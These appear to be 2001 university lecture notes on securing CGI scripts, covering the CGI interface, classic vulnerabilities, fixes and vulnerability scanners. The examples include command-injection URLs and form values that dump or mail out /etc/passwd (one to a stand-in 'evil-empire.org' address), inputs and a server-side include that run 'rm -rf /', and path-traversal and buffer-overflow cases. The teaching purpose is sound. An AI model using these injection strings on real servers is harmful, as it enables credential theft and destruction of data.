![]() CEG
499/699:
|
|
Securing the Server Machine
Securing the Web Server Program
Secured Installation of the CGI Scripts
Validate Scripts Borrowed from the Web
Common Assumptions That Can Be False
Never Accept Unchecked Input
Cookie Caution
Server-side Includes
Redirection of HTTP Requests
OS Environment
Checking the Result Codes
SUID CGI Scripts
C
Shell
Perl
Python
CGI stands for Common Gateway Interface. The word "gateway"
is unrelated to its use in networking as a synonym for routers. CGI is a
standard that a class of programs invoked via a web client are expected to
follow. CGI is a standard that allows the web-server to execute a
separate program in order to generate content. For example, http://www.example.com/cgi-bin/homepage.pl?user=rob
runs the program homepage.pl located in the directory named cgi-bin.
This program is supplied with user=rob in a so-called meta-variable, in order to
generate content specific to the user "rob". Interactive web
sites, as well as e-commerce sites, typically use some form of CGI scripting to
produce their output.
CGI programs are written in script languages such as Perl, Python, and Microsoft ASP, in traditionally compiled languages such as C, as well as in byte-code languages such as Java. The privileges and the abilities of the CGI program are controlled by the web server, and file permissions and access control lists. The triggering URL embeds the users input, if any. The URL may be essentially pre-built or built on the fly by an applet running in the web client program. The end result of invoking a CGI program is that it returns a sufficiently long string that constitutes a valid HTML page.
The front end interface to a CGI program is an HTML document called a form. Forms include the HTML tag <INPUT>. Each <INPUT> tag has a variable name associated with it. The contents of the variable forms the value portion of the variable=value token . Form data is a stream of variable=value pairs separated by the & character. Actual CGI scripts may perform input filtering on the contents of the <INPUT> field. Another HTML tag sometime seen in forms is the <SELECT> tag which allows the user on the client side to select from a finite list of choices.
The following is an illustration of how a form submission on the client machine generated a triggering URL and how the corresponding CGI program is invoked on the server.
Here is the HTML code for the above.
<form action="http://www.google.com/search" method="get"
name="f"> |
http://www.google.com/search?q=CGI+vulnerability+scanners&btnG=Google+Searchq=CGI+vulnerability+scanners&btnG=Google+Search.
This process follows its configuration rules in locating where the
CGI program named search is, and invokes it.
This invocation is generally via forking a child process with the same
privileges as the web server, and then exec-ing the program.CGI uses meta variables (used to be called environment variables) to
send the CGI program its parameters. Here are three variables (QUERY_STRING
, PATH_INFO, and PATH_TRANSLATED) relevant for us
right away.
QUERY_STRING is defined as anything which follows the first ? in
the URL. This information could be added either by an ISINDEX document, or by an
HTML form (with the GET action). It could also be manually embedded in an HTML
anchor. This string is encoded in the standard URL format of changing
spaces to +, and encoding special characters with %xx hexadecimal
encoding. The web servers parses the query string into the standard argv[]
array. For example, the query string "CGI vulnerability
scanners" would be given to your program with
argv[1]="CGI" and argv[2]="vulnerability",
argv[3]="scanners". Note that a %00 in the QUERY_STRING will be turned into the string
termination character.
PATH_INFO suggests file locations to the CGI program.
Suppose the URL for a CGI program foobar is http:/ /foo.bar.org/cgi-bin/foobar.
Upon receiving the URL http:/ /foo.bar.org/cgi-bin/foobar/extra/path/info/,
the web server will set PATH_INFO to
"/extra/path/info/". The server also initializes the PATH_TRANSLATED
environment variable to the full path name of "/extra/path/info/" by
prepending with the path of the DocumentRoot of the server.
If the form has METHOD="GET" in its FORM tag, the CGI program
will receive the encoded form input in the environment variable QUERY_STRING.
If the form has METHOD="POST" in its FORM tag, the CGI
program will receive the encoded form input on stdin. However, the
end of input must be detected by using the value of the environment
variable CONTENT_LENGTH.
Most CGI programs reside in a directory named cgi-bin. The full-path name of this directory can be whatever, but a typical web server is configured so that the CGI program appears to be at the root as in /cgi-bin.
CGI programs can return a myriad of document types: an image file, an HTML document, a plain text document, an audio clip, etc. They can also return references to other documents. In order to inform the web server what kind of document the CGI program is returning, CGI requires a header consisting of a few lines. The return types are essentially of two kinds.
In this case, you must tell the server what kind of document you will be
outputting via a MIME type. Common MIME types are things such as text/html
for HTML, and text/plain for straight ASCII text.
For example, to send back HTML to the client, the output from CGI program should be:
Content-type: text/html
<HTML><HEAD>
<TITLE>HTML output from CGI script</TITLE>
</HEAD><BODY>
<H1>Sample output</H1>
What do you think of <STRONG>this?</STRONG>
</BODY></HTML>
Instead of outputting the document, you can just tell the browser where to get the new one, or have the server automatically output the new one for you.
For example, say you want to reference a file on your Gopher server. In this case, you should know the full URL of what you want to reference and output something like:
Content-type: text/html Location: gopher://httprules.foobar.org/0 <HTML><HEAD> <TITLE>Sorry...it moved</TITLE> </HEAD><BODY> <H1>Go to gopher instead</H1> Now available at <A HREF="gopher://httprules.foobar.org/0">a new location</A> on our gopher server. </BODY></HTML>
CGI programs contain many security holes. Although the CGI protocol is not inherently insecure, CGI programs must be written with as much care as any other program that may be invoked by untrusted users with deviously constructed inputs. It is also typical that Web administrators are less skilled in security matters than the typical system administrators, and install CGI programs at their sites without realizing the associated problems. The vulnerabilities caused by the use of CGI scripts are not weaknesses in CGI itself, but are weaknesses inherent in the HTTP specification and in various system programs. CGI simply allows easier access to those vulnerabilities. There are, of course, other ways to exploit. For example, insecure file permissions can be exploited using FTP or telnet.
CGI exploits take advantage of weaknesses in the web server. By definition, a CGI exploit does not "work" on the client. Exploits on the web client side are, of course, possible via applets (in Java, JavaScript, ActiveX, VBScript, etc).
The CGI specification permits reading files, and acquiring shell access. A clever script can corrupt file systems on server machines and their attached hosts. Past CGI exploits have caused such things as unauthorized manipulation (such as removing, inserting, or altering) data from the Web server, reducing performance, halting services, being used to perform the act, or using the Web server as a Trojan horse into other systems, including your local intranet. Means of gaining access include exploiting assumptions made by the script that it does not check for, exploiting weaknesses in the server environment, and exploiting weaknesses in other programs and system calls. The primary weakness in CGI scripts is insufficient "input" validation.
The Appendix titled A List of Specific CGI Scripts Exploited gives a fairly complete list as of June 2001. Below we describe a few selected examples so that the reader has better appreciation of the issues.
The "phone book functionality" (PHF) script uses a form-based interface to get a name as input and look the name and address information up on the server. The exploit described here uses it to display the password file (as a Web page), which can then be run through a cracker (like crack). The script was included as a CGI example with the NCSA and Apache httpd servers.
Unfortunately, the PHF script did an incomplete job of checking its inputs
for tricks. The script used a call to escape_shell_cmd(), a
function that was supposed to cleanse input of "special characters."
The function failed to check for one particular character, the newline character
(\n or 0x0a). A knowledgeable attacker can thus
provide input to the form (through a URL) that includes a newline character. So
a URL such as
http://www.university.edu/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
passes the filtration unchanged. The /bin/cat /etc/passwd pushes
the content of the local (i.e., on the web server) password file to the client.
The PHF script was so widely exploited that most intrusion detection tools now check for its presence.
*A prime example of a security risk is setting up a form that allows one to enter arbitrary system commands. A "whois" CGI script can be written that will directly make a "whois" system call with the domain name provided and return information in regards to that domain name. Since this is part of a UNIX system command, one could enter something like "; rm -fr /*" which would essentially remove any file on the Web server that the Web server owns, including log files, and not perform the intended function of looking up a domain name. This type of script properly written would check the input for a valid domain name with only alphanumeric characters and delimited by a period before making the system call to "whois".
Suppose a form lets a user e-mail a message to a specified person. The HTML form page will include code like the following:
<INPUT TYPE="radio" NAME="send_to" VALUE="pmateti@cs.wright.edu">Mateti<br> <INPUT TYPE="radio" NAME="send_to" VALUE="
lball@lanl.gov">Lucille Ball<br> <INPUT TYPE="radio" NAME="send_to" VALUE="gburns@lanl.gov">George BurnsNow let's say we execute a script that writes the message to a temporary file and then e-mails that file to the selected address. In Perl, this could be done with
system("/usr/lib/sendmail -t $send_to < $temp_file");
As long as the user selects from the addresses that are given, everything will
work fine. There is however no way to be sure. Because the HTML form itself has
been transferred to the user's client machine, he/she is free to edit it to read
something like
<INPUT TYPE="radio" NAME="send_to" VALUE="aarkin@lanl.gov;mail badguy@evil-empire.org </etc/passwd"> Alan Arkin<br>As soon as this gets sent, the original sendmail call will stop at the semicolon, and the system will execute the next command--which would mail the password file to the user, who could then easily decrypt it and use it to gain login access to your machine.
This PERL program converts characters represented by their ASCII hex code string values in a URL to their actual character codes. It is similar to the "echo" command (built-in of bash).
#!/usr/bin/perl # usage: http://your.host/cgi-bin/echo?# Echos back the QUERY_STRING to the user. $| = 1; $in = $ENV{'QUERY_STRING'}; $in =~ s/%(..)/pack("c",hex($1))/ge; # Escape the nasty metacharacters # (List courtesy of http://www.cerf.net/~paulp/cgi-security/safe-cgi.txt) $in =~ s/([;<>\*\|`&\$!#\(\)\[\]\{\}:'"])/\\$1/g; print "Content-type: text/html\n\n"; system("/bin/echo $in");
Install this program in cgi-bin/echo and the URL
http://your.host/cgi-bin/echo?hello%20there
will return a page containing the text
"hello there"
Inserting %0A, the code for the new-line character (the %20
represents the blank), and one can exploit the shell to run any command you
wish. For example, the URL
http://your.host/cgi-bin/echo?%0Acat%20/etc/passwd
will bring in a page with a copy of the /etc/password file.
viewsrc.cgi v2.0 is a source-code viewing CGI script available from http://www.mimanet.com/scripts. A
vulnerability exists which allows a remote user to view any file on the
server. The following URL demonstrates the problem:
http://localhost/cgi-bin/viewsrc.cgi?loc=../[any file outside restriced
dir]
Apply the following patch to viewsrc.cgi:
53a54,56
>$FORM{'loc'} =~ s/\.\.//g;
>$FORM{'loc'} =~ s/\\//g;
>$FORM{'loc'} =~ s/\///g;
65c68
<open (INHTML, "$predo") or die &err_loc;
---
>open (INHTML, "<$predo") or die &err_loc;
This patch removes any '..', '/', or '\'s present in the $FORM{'loc'} variable.
It also makes the open() command safer by using the '<' read-only specifier.
Vendor Status: MIMAnet was contacted via <webmaster@mimane t.com>on
Tuesday, May 1, 2001. Roberto R. Morelli <morelli@altair7.com >quickly
replied and stated that the problem was verified and an official fix would be
released. Twenty two days have passed, and nothing has been done.
The overflow condition is very easily exploitable, since the code actually supplies the pointer to the exploit code itself, odd as it may seem. The pointer thusly does not need to be second-guessed at all, making life much easier for crackers.
#define MAX_ENTRIES 10000
typedef struct {
char *name;
char *val;
} entry;
...
main (int argc, char *argv[])
{
entry entries[MAX_ENTRIES];
...
for(x=0; cl && (!feof(stdin)); x++) {
m=x;
entries[x].val = fmakeword(stdin,'&',&cl);
plustospace(entries[x].val);
unescape_url(entries[x].val);
entries[x].name = makeword(entries[x].val,'=');
}
}
"Fellow C programmers would surely see the problem right away. By feeding 10,000
bogus entries, and then sending a specially prepared buffer for the 10,001'th,
you get a situation where memory is allocated, the exploit code is written into
it and the pointer is then put into the 10,001'st position of the entries struct.
This happens to be the position of the return pointer. When the program ends, it
does not call `exit' as I would say most network applications should, instead it
returns to __start, or in a case where the return pointer has been overwritten,
it returns to the user-supplied code. The only problem with this exploit is that
`fmakeword' allocates 102400 bytes for each buffer. Before you think that the
problem then becomes entirely theoretical, consider that most modern kernels do
not give the programs actual physical memory until the memory is written to. A
fair estimate would be that to be vulnerable the server would need around
40-50MB of physical and/or virtual memory, but I cant say for certain. To sum it
up, this exploit is real, you may be vulnerable if you have the post-query CGI
on your web servers (and it is *very* common). You may be lucky enough to have
an OS that prohibits the application from successfully allocating the needed
memory. Better safe than sorry; Remove the program if you have it! No one should
really need this type of application since it is a sample program designed to
demonstrate how CGI works."
Start with a properly configured server, applying all the recommendations of [Mateti 2001]. This includes appropriate screening at the router, turning off un-needed daemons, and restricting the file system. Additional precautions may be required, depending upon the partition in which you are working, who the intended audience is, and the sensitivity level of the data on the machine. These precautions including monitoring who accesses the scripts and the other activities those users perform, and consulting with your computer security officer as needed.
www, and group www.Get rid of CGI script interpreters in bin directories: http://www.cert.org/advisories/CA-96.11.interpreters_in_cgi_bin_dir.html
Run your Web server in a chroot()ed environment to protect the machine against yet to be discovered exploits
4.2.1 Apache
4.2.2 IIS
4.2.3 MS Personal Web Server
4.2.4 Zope
Remove unsafe CGI scripts. Widely-exploited CGI scripts include: Count.cgi, test-cgi, php.cgi, handler, webgais, websendmail, webdist.cgi, faxsurvey, htmlscript, pfdisplay, perl.exe, wwwboard.pl, www-sql, service.pwd, users.pwd, aglimpse, man.sh, view-source, campas, and nph-test-cgi. Simple scanning tools like cgiscan look for these problematic scripts in the usual location. See the list in the Appendix.
Note that successful input validation attacks have been seen
against ASP and Cold Fusion Markup Language (CFML) programs as well, so cgi-bin
alone is not the only server-side functionality that introduces security
problems. If you have to provide server-side programs, think carefully about
how you handle input.
http://myserver/cgi-bin/finger?dave; touch%20/tmp/gotcha http://myserver/cgi-bin/finger?dave; touch+/tmp/gotcha
If it is possible to send a form or URL that successfully executes this command, then in principle any command-line argument could be sent. The CGI script should then be reworked until it is not possible to send any unwanted system command.
CGI programs are called with user given inputs as arguments. These arguments must be analyzed for actual data expected for each incoming entry. For instance, the syntax of a phone number, a monetary amount, a name, a mailing address and so on, can all be rigorously described using formal language grammars.
The input given may contain meta-characters, such as dot, comma, semicolon, slash, exclamation etc. Make sure that these are permissible in the given context. The following characters in user-supplied data should be examined carefully, and if suspect, should be "escaped":
;<>*|`&$!#()[]{}:'"/\n
For server-side includes, check for "<" and ">"
in order to identify and validate any embedded HTML tags.
Disallow slashes, dots, etc. Look for any occurrence of "/../" (which might indicate that the user is attempting to access higher levels of the directory structure).
CGI applications have to be careful when passing user data on the command line for calls to other programs. An attacker can trick your application into executing extra commands or modifying parameters of running programs by submitting data that will be interpreted as command-line switches or options.
Suppose you are invoking grep on a text database and that a form provides the regular expression. The naïve approach
system("grep $exp database");
or the equivalent has a number of problems. What if exp has the value ``root
/etc/passwd;rm''? Not only does it grep the wrong file, it also deletes the real
database.
system("grep \"$exp\" database");
Neither double nor single quotes actually solve the problem. E.g., with double quotes
exp could be ```rm -rf /`''. Single quotes avoid this but both
suffer from problems like ``'root /etc/passwd;rm'''. The quotation marks match
with the ones that will enclose the variable, completely negating their effect.
system("grep", "-e", $exp, "database");
It is unnecessary to escape characters if you invoke programs as above.
$exp =~ s/[^\w]/\\\&/g; system("grep \"$exp\" database"); or
for (i=0,p=tmp2;exp[i];i++) {
if (!normal(exp[i])) *(p++)='\\';
*(p++)=exp[i];
}
*p=0;
sprintf(tmp, "grep \"%s\" database", exp);
system(tmp);
The above solutions handle all the problems discussed so far. E.g., if
exp were -i, grep would try to find the string
``database'' in its standard input. Using the ``-e''
option to grep would prevent this. In general you never want to call a program
that cannot tell that an argument isn't a switch unless you can restrict the
possible values for exp. GNU utilities are really good this way since they
specify ``--'' as an end of switch marker.
Any of the following HTML comments would be a security hole:
<!--#exec cmd="rm -rf /"--> <!--#include file="secretfile"-->The second command is not as general as the first, and less likely to be a security hole if the web servers restrict the content of the file name. The simplest protection measure is to not permit the web server to parse the document for server-side includes.
Redirecting HTTP requests bypasses access control rules. A less likely problem is redirecting the FILE protocol. It allows any file readable by the CGI to be accessed. Some mechanisms for redirecting HTTP requests that handle both GET and POST requests may allow PUT and DELETE. Verify that PUT and DELETE requests are not accepted by the web server.
Occasionally an author expresses a preference for compiled programs over interpreted scripts (in languages such as shell, Perl, or Python). Such an author believes the binary is more difficult to make sense of if a user is able to get a copy of it, and also because it makes it more difficult for the user to search for potential weaknesses within the binary. This is security via obscurity. The more essential point however is that the interpreter of the scripts generally permits powerful manipulation of text strings, parses the source of the script late, and does a late binding.
Most C programs use arrays without doing bounds checking, and also have arbitrary limits on array sizes. This enables the "buffer overflow" technique which can corrupt a program's stack so that arbitrary commands can be executed.
while( <FILE> ){ print if /$exp/; }
This code will not cause anything nasty to be executed. The problem with this
code is that an error in exp will cause the CGI script to get a compilation error
(which the httpd will probably report as a server internal error). This is
a poor way to handle incorrect input. Rather than manually check the syntax of a
PERL regular expression, we can have PERL safely check it for us.
&complain("Illegal regexp.") if !defined eval { if ("a" =~ /$exp/){}0;};
The eval was used as an exception handling mechanism. There are several ways of invoking eval. Summarizing from the
PERL man pages, eval $x or eval "$x"
is not safe, where as eval { ... $x ... } or eval '... $x ...'
is safe. Here x is used as a string/number/whatever inside
the code in the curly braces or single quotes.
Perl provides a mechanism, via a special version of Perl called ``taintperl'',
to prevent user-defined variables (such as those
from forms) to be used in eval(), system(), exec() or piped open()
calls. Under this option it will also disallow calling an external program
without explicitly setting the PATH environment variable at the
beginning of the script.
eval `echo $QUERY_STRING | awk 'BEGIN{RS="&"} {printf
"QS_%s\n",$1}' `
This clever little snippet takes the query string, and convents it into a set of variable set commands. Unfortunately, this script can be attacked by sending it a query string which starts with a ;.
[ack author]
Avoid writing to publicly writable directories (such as /tmp). Creating a directory in /tmp is good provided that programs can handle the directory disappearing between invocations of the CGI script. It is easy for malicious people to create symbolic links to important files or directories -- always make sure that the file you open is the file that you wanted to modify.
The default umask of many httpds is 0; that is, any file created by a CGI script will be world-writable by default. The umask should probably be set to 022 (allows others to read the file) or 077 (permits no access to anyone).
Users need to execute CGI scripts, but there is no reason for them to have read or write permissions. Similarly, users need to read the HTML driver files (and to read and execute their directory), but there is no need for them to have write or execute permission to the files (or write permission to their directory).These controls are most easily maintained as follows:
open (MAIL,"|-") || exec '/usr/lib/sendmail','-t','-oi';
Suppose the fork (in the open above) fails. The sendmail process is then
connected directly to the client. It is possible to make fork fail by simply
overloading the server. Check for the success of the fork like this:
$pid = open(MAIL, "|-");
defined ($pid) || die "fork: $!";
if (!$pid) { exec '/usr/lib/sendmail', '-t', '-oi' || exit 255; }
Making scripts SUID is dangerous if you can't trust people that have access to the machine that the script is running on. SUID scripts have many more potential security holes than normal CGI scripts. On some operating systems it is impossible to have a secure SUID shell script. The simplest methods for attacking SUID scripts rely on setting environment variables maliciously. Almost all versions of csh are completely unsafe. (PERL calls csh to evalutate ``<*.h>'' so never use that construct in a SUID PERL program -- taint checks won't catch this problem).
The program CGIwrap is a good way to allow users to run CGIs under their own UID.
Current CGI vulnerability scanners check for as many as 200 vulnerable CGIs. Below is a list of cost-free scanners.
| Sitescan | CGI scanner!Good if you look size! | 16Kb |
| ATLAS | CGI hole scanner! | 28Kb |
| Voideye | CGI vulnerability scanner! Scans 78 different vulnerabilityes. | 163Kb |
| Whisker 3.1a | Scans for over 200 known CGI vulnerabilities. | 50Kb |
| CGI scan v2.0 | Scan your network for cgi exploits. (Some texts about cgi exploits are included in the .zip file.) | 50Kb |
| Webcheck | An excellent scanner, a lot of options. | 263Kb |
| TWWWscanner 0.3 | Windows based www vulnerability scanner which looks for 186 CGI vulnerabilities .Displays http header, server info, and tries for accurate results. | 263Kb |
| ShadowSecurityScanner v1.00.009 | A freeware security scanner which checks for 17 FTP, 22 SMTP, 10 POP3 and 132 CGI vulnerabilities. | 1164Kb |
| nessus |
Acknowledgements These lecture materials are gleaned from many sources. All are presented after careful reading. In some cases, I may have unintentionally neglected proper attribution. I assure the reader it is not because I claim authorship. Indeed, in the lectures there is hardly any thing new that I have contributed. Suggestions for improvement always welcome.
| 08/10/01 02:42:31 AM |
| Open Content Copyright © 2001 pmateti@cs.wright.edu |